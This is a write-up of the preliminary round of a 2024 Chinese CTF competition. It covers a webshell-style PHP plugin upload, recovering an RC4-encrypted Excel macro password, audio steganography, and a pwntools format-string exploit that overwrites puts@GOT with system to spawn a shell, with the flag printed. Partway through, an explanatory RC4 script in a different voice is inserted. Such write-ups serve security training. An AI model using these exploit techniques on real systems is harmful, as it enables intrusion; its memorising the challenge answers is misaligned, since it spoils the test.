2024 ISG Cybersecurity Skills Competition "Guan'an Cup" (观安杯) Operations and Maintenance Track, Preliminary Round Writeup

Preface: Thanks for reading. If this helped you, remember to like, favorite and follow. Reply "2024观安杯" in the official-account backend to get the attachments. This article is also posted on CSDN.

Web-emm:


Log in to the admin backend with the administrator username and password that were set up.

Then click Plugins.

Create a directory test-test locally.

Then create test.php inside the test directory.

Pay attention to the structure of the zip archive: it must be a directory that contains the php file, otherwise the upload reports "install failed". Click upload; once the upload finishes, visit the path:

isg.idss-cn.com:25554/content/plugins/test/test.php
Misc-office:

Base64-decoding the contents of the Excel spreadsheet gives a password, but opening the file with it shows that it is a decoy:

I#ziTxnxvbg#GC9

Since this is an Office challenge, the natural thing to think of is

Use olevba from oletools to extract the VBA macro code for analysis:

```shell
olevba xxx.xlsm -p <password>   # -p: the document password recovered above
```

Extracted macro:

```vb
Function Check(user_enc)
    Encrypted = "184,116,232,38,216,127,29,89,225,84,108,82,8,0,161,49,232,127,45,252,147,140,185,210,26,107,123,2,82,189,0,167,205,130,94,54,94,242,138,139,102,79,250,139,9,142,17,42,198,113,246,6,142,31,"
    If (user_enc <> Encrypted) Then
        Check = False
    Else
        Check = True
    End If
End Function

Private Sub Worksheet_Change(ByVal Target As Range)
    ' Fires whenever B2 changes: encrypt the typed value and compare it with the constant
    If Not Intersect(Target, Me.Range("B2")) Is Nothing Then
        If Check(crypto(Target.Value)) Then
            Me.Range("C2").Value = "success"
            Me.Range("C2").Interior.Color = RGB(232, 245, 233)
        Else
            Me.Range("C2").Value = "fail"
            Me.Range("C2").Interior.Color = RGB(251, 233, 231)
        End If
    End If
End Sub

Function crypto(sMessage)
    Dim kLen, x, y, i, j, temp
    Dim s(256)
    ' Key-scheduling loop: note that no key byte is ever mixed into j
    For i = 0 To 255
        s(i) = i
    Next
    j = 0
    For i = 0 To 255
        j = (j + s(i)) Mod 256
        temp = s(i)
        s(i) = s(j)
        s(j) = temp
    Next
    ' Keystream generation, XORed with each character and emitted as "n,"
    x = 0
    y = 0
    For i = 1 To Len(sMessage)
        x = (x + 1) Mod 256
        y = (y + s(x)) Mod 256
        temp = s(x)
        s(x) = s(y)
        s(y) = temp
        crypto = crypto & (s((s(x) + s(y)) Mod 256) Xor Asc(Mid(sMessage, i, 1))) & ","
    Next
End Function
```

Asking an AI identifies this as RC4, so writing a decryption script is enough.
```python
def initialize_key_schedule(seed):
    key_schedule = list(range(256))  # initialize the key schedule
    j = 0
    for i in range(256):
        j = (j + key_schedule[i]) % 256  # like the macro, no key byte is added here
        key_schedule[i], key_schedule[j] = key_schedule[j], key_schedule[i]
    return key_schedule


def rc4_crypt(seed, data):
    key_schedule = initialize_key_schedule(seed)
    x = y = 0
    encrypted_data = []
    for byte in data:
        x = (x + 1) % 256
        y = (y + key_schedule[x]) % 256
        key_schedule[x], key_schedule[y] = key_schedule[y], key_schedule[x]
        t = key_schedule[(key_schedule[x] + key_schedule[y]) % 256]
        encrypted_data.append(chr(byte ^ t))
    return ''.join(encrypted_data)


# the original encrypted data
encrypted_data = [184, 116, 232, 38, 216, 127, 29, 89, 225, 84, 108, 82, 8, 0, 161, 49,
                  232, 127, 45, 252, 147, 140, 185, 210, 26, 107, 123, 2, 82, 189, 0, 167,
                  205, 130, 94, 54, 94, 242, 138, 139, 102, 79, 250, 139, 9, 142, 17, 42,
                  198, 113, 246, 6, 142, 31]  # some data omitted

# RC4 key seed
key_seed = [0] * len(encrypted_data)  # assume the key seed has the same length as the encrypted data; only an example

# run RC4 decryption
decrypted_data = rc4_crypt(key_seed, encrypted_data)
print(decrypted_data)
```
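The macro's crypto() is RC4 whose key-scheduling loop never mixes in a key byte, which is exactly RC4 under an all-zero key. The following is an added example, my own code rather than the writeup's script: it implements standard RC4 with an explicit key (checked against the well-known "Key"/"Plaintext" test vector), transcribes the macro's keyless variant so the two can be compared, decrypts the Encrypted constant from the macro, and verifies the recovered value by running it back through the macro logic. The names rc4_ksa, rc4_keystream, rc4, macro_crypto, parse_macro_list and recover_password are my own; the page does not state the decrypted value, so the script prints whatever it recovers instead of hard-coding it.

```python
# Added example (not the writeup's script): standard RC4 with an explicit key,
# plus a transcription of the keyless variant the macro's crypto() implements.
from typing import List


def rc4_ksa(key: bytes) -> List[int]:
    """Standard RC4 key-scheduling algorithm."""
    if not key:
        raise ValueError("RC4 key must be at least one byte")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    return s


def rc4_keystream(s: List[int], n: int) -> List[int]:
    """Standard RC4 PRGA: emit n keystream bytes from a scheduled state."""
    s = s[:]  # work on a copy so the caller's state is untouched
    x = y = 0
    out = []
    for _ in range(n):
        x = (x + 1) % 256
        y = (y + s[x]) % 256
        s[x], s[y] = s[y], s[x]
        out.append(s[(s[x] + s[y]) % 256])
    return out


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 encryption and decryption are the same keystream XOR."""
    ks = rc4_keystream(rc4_ksa(key), len(data))
    return bytes(b ^ k for b, k in zip(data, ks))


def macro_crypto(message: str) -> str:
    """Transcription of the macro's crypto(): KSA with no key material,
    output formatted as the macro does, "n,n,n," with a trailing comma."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i]) % 256  # no key byte added: same as an all-zero key
        s[i], s[j] = s[j], s[i]
    ks = rc4_keystream(s, len(message))
    return "".join(f"{k ^ ord(c)}," for c, k in zip(message, ks))


def parse_macro_list(text: str) -> bytes:
    """Turn the macro's "184,116,...,31," string back into raw bytes."""
    return bytes(int(v) for v in text.strip().rstrip(",").split(","))


# Ciphertext taken from the macro's Encrypted constant as printed above.
ENCRYPTED = ("184,116,232,38,216,127,29,89,225,84,108,82,8,0,161,49,232,127,45,252,"
             "147,140,185,210,26,107,123,2,82,189,0,167,205,130,94,54,94,242,138,139,"
             "102,79,250,139,9,142,17,42,198,113,246,6,142,31,")


def recover_password(encrypted: str = ENCRYPTED) -> str:
    """Decrypt the macro's check value with RC4 under an all-zero key.
    latin-1 keeps a 1:1 byte-to-character mapping, matching VBA's Asc()."""
    return rc4(b"\x00", parse_macro_list(encrypted)).decode("latin-1")


if __name__ == "__main__":
    pw = recover_password()
    print(repr(pw))
    # Feeding the recovered value back through the macro's logic must
    # reproduce the constant, which is what Check() in the sheet tests.
    assert macro_crypto(pw) == ENCRYPTED
```

Because RC4 with an all-zero key is a fixed, key-independent keystream, any value "protected" this way can be recovered by anyone who reads the macro; that is the weakness the challenge is built on, and the round trip at the end is the same check the worksheet performs in cell C2.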

Method 2: a tool works just as well.

Misc-see it:

Running binwalk -e on the audio file extracts a zip archive that contains a password: p@ssw0rd_1s_myg0

With a password in hand, the natural next step is steghide.

Then zsteg gives the flag:

```shell
steghide extract -sf challenge.wav   # enter the password p@ssw0rd_1s_myg0 when prompted
zsteg mygo.png
```

pwn1-dollar:

The input filters out `$`.

The input is sorted before printf prints it, but an `n` bypasses the sorting.

A format-string vulnerability was found.

Hand-write the exploit payload to get a shell.

exp:

```python
from pwn import *

# p = remote('isg.idss-cn.com', 29564)
p = process('./pwn')
libc = ELF('./libc.so.6')
elf = ELF('./pwn')


def inpt(content):
    p.sendlineafter('e > ', '1')
    p.sendlineafter('ge > ', content)


def printf():
    p.sendlineafter('e > ', '2')


def puts():
    p.sendlineafter('e > ', '3')


def pwn():
    # first format string: leak a libc pointer and derive the libc base
    inpt('n' + '%d' * 42 + '.%p.')
    printf()
    p.recvuntil('.')
    libc.address = int(p.recvuntil('.')[:-1], 16) - 0x29d90
    addr1 = (libc.symbols['system'] & 0xffff) - 0x21
    addr2 = ((libc.symbols['system'] >> 16) & 0xffff) - (libc.symbols['system'] & 0xffff)
    print('libc:', hex(libc.address))
    # second format string: write system into puts@GOT two bytes at a time with %hn
    snd = b'n' + b'%c' * 0x20 + b'%' + str(addr1).encode() + b'c%hn%' + str(addr2).encode() + b'c%hn'
    snd = snd.ljust((0x22 - 8) * 8) + p64(elf.got['puts'])
    snd = snd.ljust((0x24 - 8) * 8) + p64(elf.got['puts'] + 2)
    inpt(snd)
    printf()
    inpt('sh;')
    puts()
    p.interactive()


pwn()
## flag{4DSmeHyBCZtF71VEPopsYvx5qa9UiGQu}
```